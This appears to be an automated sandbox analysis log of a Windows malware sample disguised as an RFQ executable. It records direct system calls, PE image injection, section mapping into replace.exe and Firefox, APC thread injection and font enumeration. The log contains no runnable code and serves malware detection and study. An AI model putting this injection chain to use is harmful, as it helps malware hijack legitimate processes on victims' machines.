            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeMemory written: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: NULL target: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeSection loaded: NULL target: C:\Windows\SysWOW64\replace.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: NULL target: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: NULL target: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\replace.exeThread APC queued: target process: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess created: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe "C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe"Jump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exeProcess created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: KdcHSkcpIgYD.exe, 00000004.00000000.1853836603.00000000015A1000.00000002.00000001.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000004.00000002.2895817745.00000000015A0000.00000002.00000001.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000008.00000000.1995433621.0000000000E71000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: KdcHSkcpIgYD.exe, 00000004.00000000.1853836603.00000000015A1000.00000002.00000001.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000004.00000002.2895817745.00000000015A0000.00000002.00000001.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000008.00000000.1995433621.0000000000E71000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: KdcHSkcpIgYD.exe, 00000004.00000000.1853836603.00000000015A1000.00000002.00000001.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000004.00000002.2895817745.00000000015A0000.00000002.00000001.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000008.00000000.1995433621.0000000000E71000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: KdcHSkcpIgYD.exe, 00000004.00000000.1853836603.00000000015A1000.00000002.00000001.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000004.00000002.2895817745.00000000015A0000.00000002.00000001.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000008.00000000.1995433621.0000000000E71000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
